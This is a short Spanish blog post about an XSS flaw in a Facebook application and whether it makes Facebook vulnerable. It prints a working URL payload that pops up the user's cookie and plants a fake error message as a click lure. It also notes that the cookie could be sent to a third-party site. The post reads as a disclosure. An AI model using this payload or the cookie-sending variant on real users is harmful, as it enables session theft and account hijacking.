Esto me plantea una pregunta, si una aplicación para facebook es vulnerable a XSS entonces facebook lo es?, pues claramente si una persona X en cuestion, tiene agregada esta aplicación su facebook es vulnerable, lo que no quiere decir que por esta razón facebook lo sea.
Algo así nos comentan en el blog Desvaríos Informáticos, donde un amigo reta a otro a probar que facebook es inseguro, desgraciadamente se terminó por probar que a causa de algunas aplicaciones facebook es vulnerable, para no extender mucho el posts con definiciones que no son totalmente necesarias les dejo el enlace en wikipedia donde explican que es XSS.
Gracias a la explotación de esta vulnerabilidad podriamos tener acceso a las cookies de los usuarios (tampoco voy a explicar que se puede hacer con estas). El siguiente código nos muestra en un popup del navegador la cookie del usuario que ha ejecutado la aplicación, modificando un poco la URL lo que podriamos hacer seria enviar esta cookie a un sitio web de terceros.
http://apps.facebook.com/qeres-buen-pol-ceijh/?target=list&send_id=1517598431&x=24897%22%20href=%22%20javascript:alert%28document.cookie%29;%22%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Ccenter%3E%3Ch1%20style=%22color:red;position:relative;left:-60px;%22%3EA%20ocurrido%20un%20error,%20haz%20click%20aqu%C3%AD%20para%20volver%3C/h1%3E%3C/center%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3C/a%3E%3Cspan%20style=%22">http://apps.facebook.com/qeres-buen-pol-ceijh/?target=list&send_id=1517598431&x=24897%22%20href=%22%20javascript:alert(document.cookie);%22%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Ccenter%3E%3Ch1%20style=%22color:red;position:relative;left:-60px;%22%3EA%20ocurrido%20un%20error,%20haz%20click%20aqu%C3%AD%20para%20volver%3C/h1%3E%3C/center%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3C/a%3E%3Cspan%20style=%22Después, para una persona con los conocimientos necesarios, empezar a robar identidades seria cuestión de tiempo.
Leer Más: Desvaríos Informáticos
